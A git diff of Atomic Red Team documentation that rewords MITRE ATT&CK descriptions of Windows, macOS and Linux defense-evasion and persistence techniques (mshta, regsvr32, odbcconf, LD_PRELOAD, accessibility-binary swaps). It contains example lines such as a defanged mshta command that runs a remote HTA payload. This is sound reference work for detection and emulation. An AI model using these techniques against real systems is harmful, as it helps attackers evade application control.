-Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.
+Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.
## Atomic Tests
diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md
index c748de8d..41e8b4de 100644
--- a/atomics/T1218.003/T1218.003.md
+++ b/atomics/T1218.003/T1218.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.003)
Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
-Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
+Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application.
CMSTP.exe can also be abused to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)
diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md
index 28729027..fb959189 100644
--- a/atomics/T1218.004/T1218.004.md
+++ b/atomics/T1218.004/T1218.004.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.004)
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe.
-InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
+InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)
## Atomic Tests
diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md
index 595eca96..bddf999c 100644
--- a/atomics/T1218.005/T1218.005.md
+++ b/atomics/T1218.005/T1218.005.md
@@ -8,7 +8,7 @@ Files may be executed by mshta.exe through an inline script: mshta vbscrip
They may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta
-Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
+Mshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)
## Atomic Tests
diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md
index 3084b7a2..e0e53a4e 100644
--- a/atomics/T1218.007/T1218.007.md
+++ b/atomics/T1218.007/T1218.007.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.007)
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
-Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.
+Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
## Atomic Tests
diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md
index 960ceec5..fcba19fd 100644
--- a/atomics/T1218.008/T1218.008.md
+++ b/atomics/T1218.008/T1218.008.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.008)
Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.
-Adversaries may abuse odbcconf.exe to bypass application whitelisting solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
+Adversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR "C:\Users\Public\file.dll"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017)
## Atomic Tests
diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md
index 0e124988..1ab15341 100644
--- a/atomics/T1218.009/T1218.009.md
+++ b/atomics/T1218.009/T1218.009.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.009)
Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)
-Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
+Both utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)
## Atomic Tests
diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md
index 989108d2..9597db5f 100644
--- a/atomics/T1218.010/T1218.010.md
+++ b/atomics/T1218.010/T1218.010.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.010)
Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary. (Citation: Microsoft Regsvr32)
-Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
+Malicious usage of Regsvr32.exe may avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of allowlists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe can also be used to specifically bypass application control using functionality to load COM scriptlets to execute DLLs under user permissions. Since Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the technique is often referred to as a "Squiblydoo" attack and has been used in campaigns targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye Regsvr32 Targeting Mongolian Gov)
Regsvr32.exe can also be leveraged to register a COM Object used to establish persistence via [Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black Squiblydoo Apr 2016)
diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md
index 63cbed95..a87dd10d 100644
--- a/atomics/T1218.011/T1218.011.md
+++ b/atomics/T1218.011/T1218.011.md
@@ -1,6 +1,6 @@
# T1218.011 - Rundll32
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1218.011)
-Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
+Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Rundll32.exe can also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)
diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md
index 7de1fc92..52b4a0b2 100644
--- a/atomics/T1219/T1219.md
+++ b/atomics/T1219/T1219.md
@@ -1,6 +1,6 @@
# T1219 - Remote Access Software
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1219)
-An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be whitelisted within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
+An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote access tools may be established and used post-compromise as alternate communications channel for redundant access or as a way to establish an interactive remote desktop session with the target system. They may also be used as a component of malware to establish a reverse connection or back-connect to a service or adversary controlled system.
diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md
index a162852d..50846cf5 100644
--- a/atomics/T1220/T1220.md
+++ b/atomics/T1220/T1220.md
@@ -1,8 +1,8 @@
# T1220 - XSL Script Processing
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1220)
-Adversaries may bypass application whitelisting and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
+Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. (Citation: Microsoft XSLT Script Mar 2017)
-Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
+Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
diff --git a/atomics/T1518.001/T1518.001.md b/atomics/T1518.001/T1518.001.md
index f008a7da..6be8beac 100644
--- a/atomics/T1518.001/T1518.001.md
+++ b/atomics/T1518.001/T1518.001.md
@@ -1,8 +1,10 @@
# T1518.001 - Security Software Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1518.001)
-Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
-Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+Example commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), reg query with [Reg](https://attack.mitre.org/software/S0075), dir with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.
+
+Adversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.(Citation: Expel IO Evil in AWS)
## Atomic Tests
diff --git a/atomics/T1518/T1518.md b/atomics/T1518/T1518.md
index add53f45..5d182349 100644
--- a/atomics/T1518/T1518.md
+++ b/atomics/T1518/T1518.md
@@ -1,6 +1,6 @@
# T1518 - Software Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1518)
-Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
+Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
diff --git a/atomics/T1546.003/T1546.003.md b/atomics/T1546.003/T1546.003.md
index 6ba493cc..89c7dfea 100644
--- a/atomics/T1546.003/T1546.003.md
+++ b/atomics/T1546.003/T1546.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1546.003)
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)
-Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
+Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.
diff --git a/atomics/T1546.008/T1546.008.md b/atomics/T1546.008/T1546.008.md
index 9b33f1f7..46b2bf64 100644
--- a/atomics/T1546.008/T1546.008.md
+++ b/atomics/T1546.008/T1546.008.md
@@ -8,7 +8,7 @@ Depending on the version of Windows, an adversary may take advantage of these fe
For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)
-Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)
+Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)
* On-Screen Keyboard: C:\Windows\System32\osk.exe
* Magnifier: C:\Windows\System32\Magnify.exe
diff --git a/atomics/T1546.011/T1546.011.md b/atomics/T1546.011/T1546.011.md
index 28b6c1cb..789da6ec 100644
--- a/atomics/T1546.011/T1546.011.md
+++ b/atomics/T1546.011/T1546.011.md
@@ -16,7 +16,7 @@ Custom databases are stored in:
To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).
-Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. Shims can also be abused to establish persistence by continuously being invoked by affected programs.
+Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.
## Atomic Tests
diff --git a/atomics/T1547.004/T1547.004.md b/atomics/T1547.004/T1547.004.md
index 987bc647..57071d6c 100644
--- a/atomics/T1547.004/T1547.004.md
+++ b/atomics/T1547.004/T1547.004.md
@@ -1,7 +1,6 @@
# T1547.004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1547.004)
-
-Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
+Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
diff --git a/atomics/T1547.006/T1547.006.md b/atomics/T1547.006/T1547.006.md
index b1243370..c4c93bb2 100644
--- a/atomics/T1547.006/T1547.006.md
+++ b/atomics/T1547.006/T1547.006.md
@@ -6,7 +6,7 @@ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attac
Kernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands.
-Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)
+Adversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)
## Atomic Tests
diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md
index 9a351a21..86e80123 100644
--- a/atomics/T1564.003/T1564.003.md
+++ b/atomics/T1564.003/T1564.003.md
@@ -2,7 +2,7 @@
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1564.003)
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
-On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [VBScript](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
+On Windows, there are a variety of features in scripting languages in Windows, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019)
Similarly, on macOS the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md
index 5b6b0c02..a71d8d12 100644
--- a/atomics/T1569.001/T1569.001.md
+++ b/atomics/T1569.001/T1569.001.md
@@ -4,7 +4,7 @@
By loading or reloading [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s, adversaries can install persistence or execute changes they made.(Citation: Sofacy Komplex Trojan)
-Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process.
+Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Adversaries can abuse this functionality to execute code or even bypass application control if launchctl is an allowed process.
## Atomic Tests
diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md
index 8aef870e..4061d648 100644
--- a/atomics/T1574.006/T1574.006.md
+++ b/atomics/T1574.006/T1574.006.md
@@ -1,8 +1,10 @@
# T1574.006 - LD_PRELOAD
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1574.006)
-Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may set the LD_PRELOAD environment variable to point at malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. This environment variable is used to control when different shared libraries are loaded by a program.(Citation: TLDP Shared Libraries) Libraries specified by this variable with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+Adversaries may execute their own malicious payloads by hijacking the dynamic linker used to load libraries. The dynamic linker is used to load shared library dependencies needed by an executing program. The dynamic linker will typically check provided absolute paths and common directories for these dependencies, but can be overridden by shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries)
-LD_PRELOAD hijacking is a method of executing arbitrary code, abusing how environment variables are used to load alternate shared libraries during process execution. LD_PRELOAD hijacking may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
+Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. LD_PRELOAD can be set via the environment variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by LD_PRELOAD with be loaded and mapped into memory by dlopen() and mmap() respectively.(Citation: Code Injection on Linux and macOS) (Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)
+
+LD_PRELOAD hijacking may grant access to the victim process's memory, system/network resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may also evade detection from security products since the execution is masked under a legitimate process.
## Atomic Tests